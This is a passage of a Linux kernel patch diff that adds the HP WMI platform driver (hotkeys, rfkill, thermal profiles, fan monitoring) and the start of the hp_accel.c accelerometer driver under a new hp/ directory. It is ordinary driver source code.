++	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
++				   zero_if_sup(state), sizeof(state));
++	if (err)
++		return err;
++
++	for (i = 0; i < rfkill2_count; i++) {
++		int num = rfkill2[i].num;
++		struct bios_rfkill2_device_state *devstate;
++
++		devstate = &state.device[num];
++
++		if (num >= state.count ||
++		    devstate->rfkill_id != rfkill2[i].id) {
++			pr_warn("power configuration of the wireless devices unexpectedly changed\n");
++			continue;
++		}
++
++		rfkill_set_states(rfkill2[i].rfkill,
++				  IS_SWBLOCKED(devstate->power),
++				  IS_HWBLOCKED(devstate->power));
++	}
++
++	return 0;
++}
++
++static ssize_t display_show(struct device *dev, struct device_attribute *attr,
++			    char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_DISPLAY_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t hddtemp_show(struct device *dev, struct device_attribute *attr,
++			    char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_HDDTEMP_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t als_show(struct device *dev, struct device_attribute *attr,
++			char *buf)
++{
++	int value = hp_wmi_read_int(HPWMI_ALS_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t dock_show(struct device *dev, struct device_attribute *attr,
++			 char *buf)
++{
++	int value = hp_wmi_get_dock_state();
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t tablet_show(struct device *dev, struct device_attribute *attr,
++			   char *buf)
++{
++	int value = hp_wmi_get_tablet_mode();
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "%d\n", value);
++}
++
++static ssize_t postcode_show(struct device *dev, struct device_attribute *attr,
++			     char *buf)
++{
++	/* Get the POST error code of previous boot failure. */
++	int value = hp_wmi_read_int(HPWMI_POSTCODEERROR_QUERY);
++
++	if (value < 0)
++		return value;
++	return sprintf(buf, "0x%x\n", value);
++}
++
++static ssize_t als_store(struct device *dev, struct device_attribute *attr,
++			 const char *buf, size_t count)
++{
++	u32 tmp;
++	int ret;
++
++	ret = kstrtou32(buf, 10, &tmp);
++	if (ret)
++		return ret;
++
++	ret = hp_wmi_perform_query(HPWMI_ALS_QUERY, HPWMI_WRITE, &tmp,
++				       sizeof(tmp), 0);
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return count;
++}
++
++static ssize_t postcode_store(struct device *dev, struct device_attribute *attr,
++			      const char *buf, size_t count)
++{
++	u32 tmp = 1;
++	bool clear;
++	int ret;
++
++	ret = kstrtobool(buf, &clear);
++	if (ret)
++		return ret;
++
++	if (clear == false)
++		return -EINVAL;
++
++	/* Clear the POST error code. It is kept until cleared. */
++	ret = hp_wmi_perform_query(HPWMI_POSTCODEERROR_QUERY, HPWMI_WRITE, &tmp,
++				       sizeof(tmp), 0);
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return count;
++}
++
++static DEVICE_ATTR_RO(display);
++static DEVICE_ATTR_RO(hddtemp);
++static DEVICE_ATTR_RW(als);
++static DEVICE_ATTR_RO(dock);
++static DEVICE_ATTR_RO(tablet);
++static DEVICE_ATTR_RW(postcode);
++
++static struct attribute *hp_wmi_attrs[] = {
++	&dev_attr_display.attr,
++	&dev_attr_hddtemp.attr,
++	&dev_attr_als.attr,
++	&dev_attr_dock.attr,
++	&dev_attr_tablet.attr,
++	&dev_attr_postcode.attr,
++	NULL,
++};
++ATTRIBUTE_GROUPS(hp_wmi);
++
++static void hp_wmi_notify(u32 value, void *context)
++{
++	struct acpi_buffer response = { ACPI_ALLOCATE_BUFFER, NULL };
++	u32 event_id, event_data;
++	union acpi_object *obj;
++	acpi_status status;
++	u32 *location;
++	int key_code;
++
++	status = wmi_get_event_data(value, &response);
++	if (status != AE_OK) {
++		pr_info("bad event status 0x%x\n", status);
++		return;
++	}
++
++	obj = (union acpi_object *)response.pointer;
++
++	if (!obj)
++		return;
++	if (obj->type != ACPI_TYPE_BUFFER) {
++		pr_info("Unknown response received %d\n", obj->type);
++		kfree(obj);
++		return;
++	}
++
++	/*
++	 * Depending on ACPI version the concatenation of id and event data
++	 * inside _WED function will result in a 8 or 16 byte buffer.
++	 */
++	location = (u32 *)obj->buffer.pointer;
++	if (obj->buffer.length == 8) {
++		event_id = *location;
++		event_data = *(location + 1);
++	} else if (obj->buffer.length == 16) {
++		event_id = *location;
++		event_data = *(location + 2);
++	} else {
++		pr_info("Unknown buffer length %d\n", obj->buffer.length);
++		kfree(obj);
++		return;
++	}
++	kfree(obj);
++
++	switch (event_id) {
++	case HPWMI_DOCK_EVENT:
++		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_DOCK,
++					    hp_wmi_get_dock_state());
++		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
++					    hp_wmi_get_tablet_mode());
++		input_sync(hp_wmi_input_dev);
++		break;
++	case HPWMI_PARK_HDD:
++		break;
++	case HPWMI_SMART_ADAPTER:
++		break;
++	case HPWMI_BEZEL_BUTTON:
++	case HPWMI_OMEN_KEY:
++		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
++		if (key_code < 0)
++			break;
++
++		if (!sparse_keymap_report_event(hp_wmi_input_dev,
++						key_code, 1, true))
++			pr_info("Unknown key code - 0x%x\n", key_code);
++		break;
++	case HPWMI_WIRELESS:
++		if (rfkill2_count) {
++			hp_wmi_rfkill2_refresh();
++			break;
++		}
++
++		if (wifi_rfkill)
++			rfkill_set_states(wifi_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_WIFI),
++					  hp_wmi_get_hw_state(HPWMI_WIFI));
++		if (bluetooth_rfkill)
++			rfkill_set_states(bluetooth_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
++					  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++		if (wwan_rfkill)
++			rfkill_set_states(wwan_rfkill,
++					  hp_wmi_get_sw_state(HPWMI_WWAN),
++					  hp_wmi_get_hw_state(HPWMI_WWAN));
++		break;
++	case HPWMI_CPU_BATTERY_THROTTLE:
++		pr_info("Unimplemented CPU throttle because of 3 Cell battery event detected\n");
++		break;
++	case HPWMI_LOCK_SWITCH:
++		break;
++	case HPWMI_LID_SWITCH:
++		break;
++	case HPWMI_SCREEN_ROTATION:
++		break;
++	case HPWMI_COOLSENSE_SYSTEM_MOBILE:
++		break;
++	case HPWMI_COOLSENSE_SYSTEM_HOT:
++		break;
++	case HPWMI_PROXIMITY_SENSOR:
++		break;
++	case HPWMI_BACKLIT_KB_BRIGHTNESS:
++		break;
++	case HPWMI_PEAKSHIFT_PERIOD:
++		break;
++	case HPWMI_BATTERY_CHARGE_PERIOD:
++		break;
++	case HPWMI_SANITIZATION_MODE:
++		break;
++	case HPWMI_SMART_EXPERIENCE_APP:
++		break;
++	default:
++		pr_info("Unknown event_id - %d - 0x%x\n", event_id, event_data);
++		break;
++	}
++}
++
++static int __init hp_wmi_input_setup(void)
++{
++	acpi_status status;
++	int err, val;
++
++	hp_wmi_input_dev = input_allocate_device();
++	if (!hp_wmi_input_dev)
++		return -ENOMEM;
++
++	hp_wmi_input_dev->name = "HP WMI hotkeys";
++	hp_wmi_input_dev->phys = "wmi/input0";
++	hp_wmi_input_dev->id.bustype = BUS_HOST;
++
++	__set_bit(EV_SW, hp_wmi_input_dev->evbit);
++
++	/* Dock */
++	val = hp_wmi_get_dock_state();
++	if (!(val < 0)) {
++		__set_bit(SW_DOCK, hp_wmi_input_dev->swbit);
++		input_report_switch(hp_wmi_input_dev, SW_DOCK, val);
++	}
++
++	/* Tablet mode */
++	val = hp_wmi_get_tablet_mode();
++	if (!(val < 0)) {
++		__set_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit);
++		input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE, val);
++	}
++
++	err = sparse_keymap_setup(hp_wmi_input_dev, hp_wmi_keymap, NULL);
++	if (err)
++		goto err_free_dev;
++
++	/* Set initial hardware state */
++	input_sync(hp_wmi_input_dev);
++
++	if (!hp_wmi_bios_2009_later() && hp_wmi_bios_2008_later())
++		hp_wmi_enable_hotkeys();
++
++	status = wmi_install_notify_handler(HPWMI_EVENT_GUID, hp_wmi_notify, NULL);
++	if (ACPI_FAILURE(status)) {
++		err = -EIO;
++		goto err_free_dev;
++	}
++
++	err = input_register_device(hp_wmi_input_dev);
++	if (err)
++		goto err_uninstall_notifier;
++
++	return 0;
++
++ err_uninstall_notifier:
++	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
++ err_free_dev:
++	input_free_device(hp_wmi_input_dev);
++	return err;
++}
++
++static void hp_wmi_input_destroy(void)
++{
++	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
++	input_unregister_device(hp_wmi_input_dev);
++}
++
++static int __init hp_wmi_rfkill_setup(struct platform_device *device)
++{
++	int err, wireless;
++
++	wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++	if (wireless < 0)
++		return wireless;
++
++	err = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE, &wireless,
++				   sizeof(wireless), 0);
++	if (err)
++		return err;
++
++	if (wireless & 0x1) {
++		wifi_rfkill = rfkill_alloc("hp-wifi", &device->dev,
++					   RFKILL_TYPE_WLAN,
++					   &hp_wmi_rfkill_ops,
++					   (void *) HPWMI_WIFI);
++		if (!wifi_rfkill)
++			return -ENOMEM;
++		rfkill_init_sw_state(wifi_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_WIFI));
++		rfkill_set_hw_state(wifi_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_WIFI));
++		err = rfkill_register(wifi_rfkill);
++		if (err)
++			goto register_wifi_error;
++	}
++
++	if (wireless & 0x2) {
++		bluetooth_rfkill = rfkill_alloc("hp-bluetooth", &device->dev,
++						RFKILL_TYPE_BLUETOOTH,
++						&hp_wmi_rfkill_ops,
++						(void *) HPWMI_BLUETOOTH);
++		if (!bluetooth_rfkill) {
++			err = -ENOMEM;
++			goto register_bluetooth_error;
++		}
++		rfkill_init_sw_state(bluetooth_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_BLUETOOTH));
++		rfkill_set_hw_state(bluetooth_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++		err = rfkill_register(bluetooth_rfkill);
++		if (err)
++			goto register_bluetooth_error;
++	}
++
++	if (wireless & 0x4) {
++		wwan_rfkill = rfkill_alloc("hp-wwan", &device->dev,
++					   RFKILL_TYPE_WWAN,
++					   &hp_wmi_rfkill_ops,
++					   (void *) HPWMI_WWAN);
++		if (!wwan_rfkill) {
++			err = -ENOMEM;
++			goto register_wwan_error;
++		}
++		rfkill_init_sw_state(wwan_rfkill,
++				     hp_wmi_get_sw_state(HPWMI_WWAN));
++		rfkill_set_hw_state(wwan_rfkill,
++				    hp_wmi_get_hw_state(HPWMI_WWAN));
++		err = rfkill_register(wwan_rfkill);
++		if (err)
++			goto register_wwan_error;
++	}
++
++	return 0;
++
++register_wwan_error:
++	rfkill_destroy(wwan_rfkill);
++	wwan_rfkill = NULL;
++	if (bluetooth_rfkill)
++		rfkill_unregister(bluetooth_rfkill);
++register_bluetooth_error:
++	rfkill_destroy(bluetooth_rfkill);
++	bluetooth_rfkill = NULL;
++	if (wifi_rfkill)
++		rfkill_unregister(wifi_rfkill);
++register_wifi_error:
++	rfkill_destroy(wifi_rfkill);
++	wifi_rfkill = NULL;
++	return err;
++}
++
++static int __init hp_wmi_rfkill2_setup(struct platform_device *device)
++{
++	struct bios_rfkill2_state state;
++	int err, i;
++
++	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
++				   zero_if_sup(state), sizeof(state));
++	if (err)
++		return err < 0 ? err : -EINVAL;
++
++	if (state.count > HPWMI_MAX_RFKILL2_DEVICES) {
++		pr_warn("unable to parse 0x1b query output\n");
++		return -EINVAL;
++	}
++
++	for (i = 0; i < state.count; i++) {
++		struct rfkill *rfkill;
++		enum rfkill_type type;
++		char *name;
++
++		switch (state.device[i].radio_type) {
++		case HPWMI_WIFI:
++			type = RFKILL_TYPE_WLAN;
++			name = "hp-wifi";
++			break;
++		case HPWMI_BLUETOOTH:
++			type = RFKILL_TYPE_BLUETOOTH;
++			name = "hp-bluetooth";
++			break;
++		case HPWMI_WWAN:
++			type = RFKILL_TYPE_WWAN;
++			name = "hp-wwan";
++			break;
++		case HPWMI_GPS:
++			type = RFKILL_TYPE_GPS;
++			name = "hp-gps";
++			break;
++		default:
++			pr_warn("unknown device type 0x%x\n",
++				state.device[i].radio_type);
++			continue;
++		}
++
++		if (!state.device[i].vendor_id) {
++			pr_warn("zero device %d while %d reported\n",
++				i, state.count);
++			continue;
++		}
++
++		rfkill = rfkill_alloc(name, &device->dev, type,
++				      &hp_wmi_rfkill2_ops, (void *)(long)i);
++		if (!rfkill) {
++			err = -ENOMEM;
++			goto fail;
++		}
++
++		rfkill2[rfkill2_count].id = state.device[i].rfkill_id;
++		rfkill2[rfkill2_count].num = i;
++		rfkill2[rfkill2_count].rfkill = rfkill;
++
++		rfkill_init_sw_state(rfkill,
++				     IS_SWBLOCKED(state.device[i].power));
++		rfkill_set_hw_state(rfkill,
++				    IS_HWBLOCKED(state.device[i].power));
++
++		if (!(state.device[i].power & HPWMI_POWER_BIOS))
++			pr_info("device %s blocked by BIOS\n", name);
++
++		err = rfkill_register(rfkill);
++		if (err) {
++			rfkill_destroy(rfkill);
++			goto fail;
++		}
++
++		rfkill2_count++;
++	}
++
++	return 0;
++fail:
++	for (; rfkill2_count > 0; rfkill2_count--) {
++		rfkill_unregister(rfkill2[rfkill2_count - 1].rfkill);
++		rfkill_destroy(rfkill2[rfkill2_count - 1].rfkill);
++	}
++	return err;
++}
++
++static int platform_profile_omen_get(struct platform_profile_handler *pprof,
++				     enum platform_profile_option *profile)
++{
++	int tp;
++
++	tp = omen_thermal_profile_get();
++	if (tp < 0)
++		return tp;
++
++	switch (tp) {
++	case HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE:
++	case HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE:
++		*profile = PLATFORM_PROFILE_PERFORMANCE;
++		break;
++	case HP_OMEN_V0_THERMAL_PROFILE_DEFAULT:
++	case HP_OMEN_V1_THERMAL_PROFILE_DEFAULT:
++		*profile = PLATFORM_PROFILE_BALANCED;
++		break;
++	case HP_OMEN_V0_THERMAL_PROFILE_COOL:
++	case HP_OMEN_V1_THERMAL_PROFILE_COOL:
++		*profile = PLATFORM_PROFILE_COOL;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int platform_profile_omen_set(struct platform_profile_handler *pprof,
++				     enum platform_profile_option profile)
++{
++	int err, tp, tp_version;
++
++	tp_version = omen_get_thermal_policy_version();
++
++	if (tp_version < 0 || tp_version > 1)
++		return -EOPNOTSUPP;
++
++	switch (profile) {
++	case PLATFORM_PROFILE_PERFORMANCE:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE;
++		break;
++	case PLATFORM_PROFILE_BALANCED:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_DEFAULT;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_DEFAULT;
++		break;
++	case PLATFORM_PROFILE_COOL:
++		if (tp_version == 0)
++			tp = HP_OMEN_V0_THERMAL_PROFILE_COOL;
++		else
++			tp = HP_OMEN_V1_THERMAL_PROFILE_COOL;
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	err = omen_thermal_profile_set(tp);
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++
++static int thermal_profile_get(void)
++{
++	return hp_wmi_read_int(HPWMI_THERMAL_PROFILE_QUERY);
++}
++
++static int thermal_profile_set(int thermal_profile)
++{
++	return hp_wmi_perform_query(HPWMI_THERMAL_PROFILE_QUERY, HPWMI_WRITE, &thermal_profile,
++							   sizeof(thermal_profile), 0);
++}
++
++static int hp_wmi_platform_profile_get(struct platform_profile_handler *pprof,
++					enum platform_profile_option *profile)
++{
++	int tp;
++
++	tp = thermal_profile_get();
++	if (tp < 0)
++		return tp;
++
++	switch (tp) {
++	case HP_THERMAL_PROFILE_PERFORMANCE:
++		*profile =  PLATFORM_PROFILE_PERFORMANCE;
++		break;
++	case HP_THERMAL_PROFILE_DEFAULT:
++		*profile =  PLATFORM_PROFILE_BALANCED;
++		break;
++	case HP_THERMAL_PROFILE_COOL:
++		*profile =  PLATFORM_PROFILE_COOL;
++		break;
++	case HP_THERMAL_PROFILE_QUIET:
++		*profile = PLATFORM_PROFILE_QUIET;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int hp_wmi_platform_profile_set(struct platform_profile_handler *pprof,
++					enum platform_profile_option profile)
++{
++	int err, tp;
++
++	switch (profile) {
++	case PLATFORM_PROFILE_PERFORMANCE:
++		tp =  HP_THERMAL_PROFILE_PERFORMANCE;
++		break;
++	case PLATFORM_PROFILE_BALANCED:
++		tp =  HP_THERMAL_PROFILE_DEFAULT;
++		break;
++	case PLATFORM_PROFILE_COOL:
++		tp =  HP_THERMAL_PROFILE_COOL;
++		break;
++	case PLATFORM_PROFILE_QUIET:
++		tp = HP_THERMAL_PROFILE_QUIET;
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	err = thermal_profile_set(tp);
++	if (err)
++		return err;
++
++	return 0;
++}
++
++static int thermal_profile_setup(void)
++{
++	int err, tp;
++
++	if (is_omen_thermal_profile()) {
++		tp = omen_thermal_profile_get();
++		if (tp < 0)
++			return tp;
++
++		/*
++		 * call thermal profile write command to ensure that the
++		 * firmware correctly sets the OEM variables
++		 */
++
++		err = omen_thermal_profile_set(tp);
++		if (err < 0)
++			return err;
++
++		platform_profile_handler.profile_get = platform_profile_omen_get;
++		platform_profile_handler.profile_set = platform_profile_omen_set;
++	} else {
++		tp = thermal_profile_get();
++
++		if (tp < 0)
++			return tp;
++
++		/*
++		 * call thermal profile write command to ensure that the
++		 * firmware correctly sets the OEM variables for the DPTF
++		 */
++		err = thermal_profile_set(tp);
++		if (err)
++			return err;
++
++		platform_profile_handler.profile_get = hp_wmi_platform_profile_get;
++		platform_profile_handler.profile_set = hp_wmi_platform_profile_set;
++
++		set_bit(PLATFORM_PROFILE_QUIET, platform_profile_handler.choices);
++	}
++
++	set_bit(PLATFORM_PROFILE_COOL, platform_profile_handler.choices);
++	set_bit(PLATFORM_PROFILE_BALANCED, platform_profile_handler.choices);
++	set_bit(PLATFORM_PROFILE_PERFORMANCE, platform_profile_handler.choices);
++
++	err = platform_profile_register(&platform_profile_handler);
++	if (err)
++		return err;
++
++	platform_profile_support = true;
++
++	return 0;
++}
++
++static int hp_wmi_hwmon_init(void);
++
++static int __init hp_wmi_bios_setup(struct platform_device *device)
++{
++	int err;
++	/* clear detected rfkill devices */
++	wifi_rfkill = NULL;
++	bluetooth_rfkill = NULL;
++	wwan_rfkill = NULL;
++	rfkill2_count = 0;
++
++	/*
++	 * In pre-2009 BIOS, command 1Bh return 0x4 to indicate that
++	 * BIOS no longer controls the power for the wireless
++	 * devices. All features supported by this command will no
++	 * longer be supported.
++	 */
++	if (!hp_wmi_bios_2009_later()) {
++		if (hp_wmi_rfkill_setup(device))
++			hp_wmi_rfkill2_setup(device);
++	}
++
++	err = hp_wmi_hwmon_init();
++
++	if (err < 0)
++		return err;
++
++	thermal_profile_setup();
++
++	return 0;
++}
++
++static int __exit hp_wmi_bios_remove(struct platform_device *device)
++{
++	int i;
++
++	for (i = 0; i < rfkill2_count; i++) {
++		rfkill_unregister(rfkill2[i].rfkill);
++		rfkill_destroy(rfkill2[i].rfkill);
++	}
++
++	if (wifi_rfkill) {
++		rfkill_unregister(wifi_rfkill);
++		rfkill_destroy(wifi_rfkill);
++	}
++	if (bluetooth_rfkill) {
++		rfkill_unregister(bluetooth_rfkill);
++		rfkill_destroy(bluetooth_rfkill);
++	}
++	if (wwan_rfkill) {
++		rfkill_unregister(wwan_rfkill);
++		rfkill_destroy(wwan_rfkill);
++	}
++
++	if (platform_profile_support)
++		platform_profile_remove();
++
++	return 0;
++}
++
++static int hp_wmi_resume_handler(struct device *device)
++{
++	/*
++	 * Hardware state may have changed while suspended, so trigger
++	 * input events for the current state. As this is a switch,
++	 * the input layer will only actually pass it on if the state
++	 * changed.
++	 */
++	if (hp_wmi_input_dev) {
++		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_DOCK,
++					    hp_wmi_get_dock_state());
++		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
++			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
++					    hp_wmi_get_tablet_mode());
++		input_sync(hp_wmi_input_dev);
++	}
++
++	if (rfkill2_count)
++		hp_wmi_rfkill2_refresh();
++
++	if (wifi_rfkill)
++		rfkill_set_states(wifi_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_WIFI),
++				  hp_wmi_get_hw_state(HPWMI_WIFI));
++	if (bluetooth_rfkill)
++		rfkill_set_states(bluetooth_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
++				  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
++	if (wwan_rfkill)
++		rfkill_set_states(wwan_rfkill,
++				  hp_wmi_get_sw_state(HPWMI_WWAN),
++				  hp_wmi_get_hw_state(HPWMI_WWAN));
++
++	return 0;
++}
++
++static const struct dev_pm_ops hp_wmi_pm_ops = {
++	.resume  = hp_wmi_resume_handler,
++	.restore  = hp_wmi_resume_handler,
++};
++
++static struct platform_driver hp_wmi_driver = {
++	.driver = {
++		.name = "hp-wmi",
++		.pm = &hp_wmi_pm_ops,
++		.dev_groups = hp_wmi_groups,
++	},
++	.remove = __exit_p(hp_wmi_bios_remove),
++};
++
++static umode_t hp_wmi_hwmon_is_visible(const void *data,
++				       enum hwmon_sensor_types type,
++				       u32 attr, int channel)
++{
++	switch (type) {
++	case hwmon_pwm:
++		return 0644;
++	case hwmon_fan:
++		if (hp_wmi_get_fan_speed(channel) >= 0)
++			return 0444;
++		break;
++	default:
++		return 0;
++	}
++
++	return 0;
++}
++
++static int hp_wmi_hwmon_read(struct device *dev, enum hwmon_sensor_types type,
++			     u32 attr, int channel, long *val)
++{
++	int ret;
++
++	switch (type) {
++	case hwmon_fan:
++		ret = hp_wmi_get_fan_speed(channel);
++
++		if (ret < 0)
++			return ret;
++		*val = ret;
++		return 0;
++	case hwmon_pwm:
++		switch (hp_wmi_fan_speed_max_get()) {
++		case 0:
++			/* 0 is automatic fan, which is 2 for hwmon */
++			*val = 2;
++			return 0;
++		case 1:
++			/* 1 is max fan, which is 0
++			 * (no fan speed control) for hwmon
++			 */
++			*val = 0;
++			return 0;
++		default:
++			/* shouldn't happen */
++			return -ENODATA;
++		}
++	default:
++		return -EINVAL;
++	}
++}
++
++static int hp_wmi_hwmon_write(struct device *dev, enum hwmon_sensor_types type,
++			      u32 attr, int channel, long val)
++{
++	switch (type) {
++	case hwmon_pwm:
++		switch (val) {
++		case 0:
++			/* 0 is no fan speed control (max), which is 1 for us */
++			return hp_wmi_fan_speed_max_set(1);
++		case 2:
++			/* 2 is automatic speed control, which is 0 for us */
++			return hp_wmi_fan_speed_max_set(0);
++		default:
++			/* we don't support manual fan speed control */
++			return -EINVAL;
++		}
++	default:
++		return -EOPNOTSUPP;
++	}
++}
++
++static const struct hwmon_channel_info *info[] = {
++	HWMON_CHANNEL_INFO(fan, HWMON_F_INPUT, HWMON_F_INPUT),
++	HWMON_CHANNEL_INFO(pwm, HWMON_PWM_ENABLE),
++	NULL
++};
++
++static const struct hwmon_ops ops = {
++	.is_visible = hp_wmi_hwmon_is_visible,
++	.read = hp_wmi_hwmon_read,
++	.write = hp_wmi_hwmon_write,
++};
++
++static const struct hwmon_chip_info chip_info = {
++	.ops = &ops,
++	.info = info,
++};
++
++static int hp_wmi_hwmon_init(void)
++{
++	struct device *dev = &hp_wmi_platform_dev->dev;
++	struct device *hwmon;
++
++	hwmon = devm_hwmon_device_register_with_info(dev, "hp", &hp_wmi_driver,
++						     &chip_info, NULL);
++
++	if (IS_ERR(hwmon)) {
++		dev_err(dev, "Could not register hp hwmon device\n");
++		return PTR_ERR(hwmon);
++	}
++
++	return 0;
++}
++
++static int __init hp_wmi_init(void)
++{
++	int event_capable = wmi_has_guid(HPWMI_EVENT_GUID);
++	int bios_capable = wmi_has_guid(HPWMI_BIOS_GUID);
++	int err, tmp = 0;
++
++	if (!bios_capable && !event_capable)
++		return -ENODEV;
++
++	if (hp_wmi_perform_query(HPWMI_HARDWARE_QUERY, HPWMI_READ, &tmp,
++				 sizeof(tmp), sizeof(tmp)) == HPWMI_RET_INVALID_PARAMETERS)
++		zero_insize_support = true;
++
++	if (event_capable) {
++		err = hp_wmi_input_setup();
++		if (err)
++			return err;
++	}
++
++	if (bios_capable) {
++		hp_wmi_platform_dev =
++			platform_device_register_simple("hp-wmi", PLATFORM_DEVID_NONE, NULL, 0);
++		if (IS_ERR(hp_wmi_platform_dev)) {
++			err = PTR_ERR(hp_wmi_platform_dev);
++			goto err_destroy_input;
++		}
++
++		err = platform_driver_probe(&hp_wmi_driver, hp_wmi_bios_setup);
++		if (err)
++			goto err_unregister_device;
++	}
++
++	return 0;
++
++err_unregister_device:
++	platform_device_unregister(hp_wmi_platform_dev);
++err_destroy_input:
++	if (event_capable)
++		hp_wmi_input_destroy();
++
++	return err;
++}
++module_init(hp_wmi_init);
++
++static void __exit hp_wmi_exit(void)
++{
++	if (wmi_has_guid(HPWMI_EVENT_GUID))
++		hp_wmi_input_destroy();
++
++	if (hp_wmi_platform_dev) {
++		platform_device_unregister(hp_wmi_platform_dev);
++		platform_driver_unregister(&hp_wmi_driver);
++	}
++}
++module_exit(hp_wmi_exit);
+diff --git a/drivers/platform/x86/hp/hp_accel.c b/drivers/platform/x86/hp/hp_accel.c
+new file mode 100644
+index 0000000000000..6477591747cfd
+--- /dev/null
++++ b/drivers/platform/x86/hp/hp_accel.c
+@@ -0,0 +1,387 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  hp_accel.c - Interface between LIS3LV02DL driver and HP ACPI BIOS
++ *
++ *  Copyright (C) 2007-2008 Yan Burman
++ *  Copyright (C) 2008 Eric Piel
++ *  Copyright (C) 2008-2009 Pavel Machek
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/init.h>
++#include <linux/dmi.h>
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/platform_device.h>
++#include <linux/interrupt.h>
++#include <linux/delay.h>
++#include <linux/wait.h>
++#include <linux/poll.h>
++#include <linux/freezer.h>
++#include <linux/uaccess.h>
++#include <linux/leds.h>
++#include <linux/atomic.h>
++#include <linux/acpi.h>
++#include <linux/i8042.h>
++#include <linux/serio.h>
++#include "../../../misc/lis3lv02d/lis3lv02d.h"
++
++/* Delayed LEDs infrastructure ------------------------------------ */
++
++/* Special LED class that can defer work */
++struct delayed_led_classdev {
++	struct led_classdev led_classdev;
++	struct work_struct work;
++	enum led_brightness new_brightness;
++
++	unsigned int led;		/* For driver */
++	void (*set_brightness)(struct delayed_led_classdev *data, enum led_brightness value);
++};
++
++static inline void delayed_set_status_worker(struct work_struct *work)
++{
++	struct delayed_led_classdev *data =
++			container_of(work, struct delayed_led_classdev, work);
++
++	data->set_brightness(data, data->new_brightness);
++}
++
++static inline void delayed_sysfs_set(struct led_classdev *led_cdev,
++			      enum led_brightness brightness)
++{
++	struct delayed_led_classdev *data = container_of(led_cdev,
++			     struct delayed_led_classdev, led_classdev);
++	data->new_brightness = brightness;
++	schedule_work(&data->work);
++}
++
++/* HP-specific accelerometer driver ------------------------------------ */
++
++/* e0 25, e0 26, e0 27, e0 28 are scan codes that the accelerometer with acpi id
++ * HPQ6000 sends through the keyboard bus */
++#define ACCEL_1 0x25
++#define ACCEL_2 0x26
++#define ACCEL_3 0x27
++#define ACCEL_4 0x28
++
++/* For automatic insertion of the module */
++static const struct acpi_device_id lis3lv02d_device_ids[] = {
++	{"HPQ0004", 0}, /* HP Mobile Data Protection System PNP */
++	{"HPQ6000", 0}, /* HP Mobile Data Protection System PNP */
++	{"HPQ6007", 0}, /* HP Mobile Data Protection System PNP */
++	{"", 0},
++};
++MODULE_DEVICE_TABLE(acpi, lis3lv02d_device_ids);
++
++/**
++ * lis3lv02d_acpi_init - initialize the device for ACPI
++ * @lis3: pointer to the device struct
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_init(struct lis3lv02d *lis3)
++{
++	return 0;
++}
++
++/**
++ * lis3lv02d_acpi_read - ACPI ALRD method: read a register
++ * @lis3: pointer to the device struct
++ * @reg:    the register to read
++ * @ret:    result of the operation
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_read(struct lis3lv02d *lis3, int reg, u8 *ret)
++{
++	struct acpi_device *dev = lis3->bus_priv;
++	union acpi_object arg0 = { ACPI_TYPE_INTEGER };
++	struct acpi_object_list args = { 1, &arg0 };
++	unsigned long long lret;
++	acpi_status status;
++
++	arg0.integer.value = reg;
++
++	status = acpi_evaluate_integer(dev->handle, "ALRD", &args, &lret);
++	if (ACPI_FAILURE(status))
